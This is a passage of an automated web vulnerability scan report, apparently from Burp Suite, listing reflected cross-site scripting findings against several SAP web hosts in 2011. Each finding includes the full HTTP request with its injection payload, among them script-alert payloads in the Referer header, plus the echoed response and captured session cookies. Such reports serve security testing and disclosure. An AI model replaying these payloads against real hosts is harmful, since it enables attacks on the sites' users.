<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/help-portal?598d1"><a>cbc4ee84307=1">
...[SNIP]...

1.162. http://www400.sdn.sap.com/irj/scn/logon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www400.sdn.sap.com
Path:   /irj/scn/logon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a451"><a>d1a7fcc6a81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/logon?redirect=/irj/scn/help-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&1a451"><a>d1a7fcc6a81=1 HTTP/1.1
Host: www400.sdn.sap.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); saplb_*=(J2EE1712400)1712450; JSESSIONID=(J2EE1712400)ID1148016850DB00541318121912174719End; SDNSTATE=811864236.14340.0000; shpuvid=172.16.92.241.1321213592635805; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f27079; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=session#1321213478215-608827#1321215590|check#true#1321213790; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1321215529275%3B%20pe%3Dno%2520value%7C1321215529283%3B%20c3%3Dscn%253Ablog%253Amanuel%2520bellet%253Adynamically%2520handling%2520structure%2520data%2520types%2520defined%2520on%2520a%2520remote%2520dictionary%7C1321215529289%3B%20s_nr%3D1321213729321-Returning%7C1323805729321%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813729328%3B%20s_visit%3D1%7C1321215529331%3B%20gpv_p47%3Dno%2520value%7C1321215529336%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D10%3B%20s_sq%3Dsapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/scn/logon%2525253Fredirect%2525253D/irj/scn/help-portal%252526ot%25253DA%3B; PortalAlias=scn

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 20378
Date: Sun, 13 Nov 2011 19:54:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
/irj/scn/help-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&1a451"><a>d1a7fcc6a81=1">
...[SNIP]...

1.163. http://www400.sdn.sap.com/irj/scn/logon [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www400.sdn.sap.com
Path:   /irj/scn/logon

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6ab"><a>299721fd6ca was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/scn/logon?redirect=/irj/scn/help-portal&redirect=%2Firj%2Fscn%2Fhelp-portaled6ab"><a>299721fd6ca&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal HTTP/1.1
Host: www400.sdn.sap.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); saplb_*=(J2EE1712400)1712450; JSESSIONID=(J2EE1712400)ID1148016850DB00541318121912174719End; SDNSTATE=811864236.14340.0000; shpuvid=172.16.92.241.1321213592635805; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww400.sdn.sap.com%2firj%2fscn%2fhelp-portal; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213694|session#1321213478215-608827#1321215494; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Asdn%7C1321215518216%3B%20pe%3Dno%2520value%7C1321215518223%3B%20c3%3Dno%2520value%7C1321215518245%3B%20s_nr%3D1321213718253-Returning%7C1323805718253%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813718258%3B%20s_visit%3D1%7C1321215518261%3B%20gpv_p47%3Dno%2520value%7C1321215518268%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D9%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Asdn%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/scn/weblogs%2525253Fblog%2525253D/pub/wlg/27079%252526ot%25253DA%2526sapsuite5%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Ahelp-portal%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www400.sdn.sap.com/irj/scn/logon%2525253Fredirect%2525253D/irj/scn/help-portal%252526ot%25253DA%3B; PortalAlias=scn

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 21479
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:42 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/scn/logon?redirect=/irj/scn/help-portal&redirect=%2Firj%2Fscn%2Fhelp-portaled6ab"><a>299721fd6ca&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal">
...[SNIP]...

1.164. http://www400.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www400.sdn.sap.com
Path:   /irj/sdn/logon

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73661"><a>e3398a6f2f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sdn/logon?redirect=http%3A%2F%2Fforums400.sdn.sap.com%3A80%2Fthread.jspa%3FthreadID%3D480818%269751ab%3Fxss%3D1&73661"><a>e3398a6f2f1=1 HTTP/1.1
Host: www400.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums400.sdn.sap.com/thread.jspa?threadID=480818&9751ab?xss=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fsdn%2flogon%3fredirect%3dhttp%3a%2f%2fforums.sdn.sap.com%3a80%2fmessage.jspa%3fmessageID%3d7893915; mbox=check#true#1321213576|session#1321213478215-608827#1321215376; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Asdn%253Alogon%7C1321215316005%3B%20pe%3Dno%2520value%7C1321215316010%3B%20c3%3Dno%2520value%7C1321215316013%3B%20s_nr%3D1321213516024-Returning%7C1323805516024%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813516029%3B%20s_visit%3D1%7C1321215316030%3B%20gpv_p47%3Dno%2520value%7C1321215316034%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3D%3B; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 21894
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:51:38 GMT
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums400.sdn.sap.com%3A80%2Fthread.jspa%3FthreadID%3D480818%269751ab%3Fxss%3D1&73661"><a>e3398a6f2f1=1">
...[SNIP]...

1.165. http://www400.sdn.sap.com/irj/sdn/logon [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www400.sdn.sap.com
Path:   /irj/sdn/logon

Issue detail

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e05ee"><a>9a7faa0d167 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /irj/sdn/logon?redirect=http%3A%2F%2Fforums400.sdn.sap.com%3A80%2Fthread.jspa%3FthreadID%3D480818%269751ab%3Fxss%3D1e05ee"><a>9a7faa0d167 HTTP/1.1
Host: www400.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://forums400.sdn.sap.com/thread.jspa?threadID=480818&9751ab?xss=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fsdn%2flogon%3fredirect%3dhttp%3a%2f%2fforums.sdn.sap.com%3a80%2fmessage.jspa%3fmessageID%3d7893915; mbox=check#true#1321213576|session#1321213478215-608827#1321215376; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Asdn%253Alogon%7C1321215316005%3B%20pe%3Dno%2520value%7C1321215316010%3B%20c3%3Dno%2520value%7C1321215316013%3B%20s_nr%3D1321213516024-Returning%7C1323805516024%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813516029%3B%20s_visit%3D1%7C1321215316030%3B%20gpv_p47%3Dno%2520value%7C1321215316034%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3D%3B; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg==
Expires: 0
Content-Length: 22036
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:50:57 GMT
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums400.sdn.sap.com%3A80%2Fthread.jspa%3FthreadID%3D480818%269751ab%3Fxss%3D1e05ee"><a>9a7faa0d167">
...[SNIP]...

1.166. https://connectblrl02.sap.com/download_plugin.php3 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://connectblrl02.sap.com
Path:   /download_plugin.php3

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec41b"><script>alert(1)</script>36e9502d047 was submitted in the Referer HTTP header. This input was echoed as ec41b\"><script>alert(1)</script>36e9502d047 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /download_plugin.php3 HTTP/1.1
Host: connectblrl02.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ec41b"><script>alert(1)</script>36e9502d047

Response

HTTP/1.1 200 OK
Date: Mon, 14 Nov 2011 03:04:40 GMT
Server: Apache
Connection: Close
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 531

<html>
<HEAD>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<link rel="stylesheet" type="text/css" HREF="/res/main3.css">
</HEAD>

<body>

<TABLE CELLPADDING=10 BORDER=0 WID
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=ec41b\"><script>alert(1)</script>36e9502d047">
...[SNIP]...

1.167. https://connectsha01.sap.com/download_plugin.php3 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://connectsha01.sap.com
Path:   /download_plugin.php3

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99cfc"><script>alert(1)</script>5410b1df95 was submitted in the Referer HTTP header. This input was echoed as 99cfc\"><script>alert(1)</script>5410b1df95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /download_plugin.php3?langchar=en.iso-8859-1&ui_translation=off HTTP/1.1
Host: connectsha01.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=99cfc"><script>alert(1)</script>5410b1df95
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; mbox=session#1321210845752-117832#1321213133|check#true#1321211333; VHOST=standard; F5CAPTCHA=3f04e6dfd219a9414e8dc00f93c51d8f; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; uRoamTestCookie=TEST; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE

Response

HTTP/1.1 200 OK
Date: Sun, 13 Nov 2011 19:26:09 GMT
Server: Apache
Connection: Close
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html
Content-Length: 1709

<html>
<HEAD>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<link rel="stylesheet" type="text/css" HREF="/res/main3.css">
</HEAD>

<body>

<TABLE CELLPADDING=10 BORDER=0 WID
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=99cfc\"><script>alert(1)</script>5410b1df95">
...[SNIP]...

1.168. https://connecttyo01.sap.com/download_plugin.php3 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://connecttyo01.sap.com
Path:   /download_plugin.php3

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8d9"><script>alert(1)</script>a3b8e5a18ac was submitted in the Referer HTTP header. This input was echoed as 4b8d9\"><script>alert(1)</script>a3b8e5a18ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /download_plugin.php3?langchar=en.iso-8859-1&ui_translation=off HTTP/1.1
Host: connecttyo01.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=4b8d9"><script>alert(1)</script>a3b8e5a18ac
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
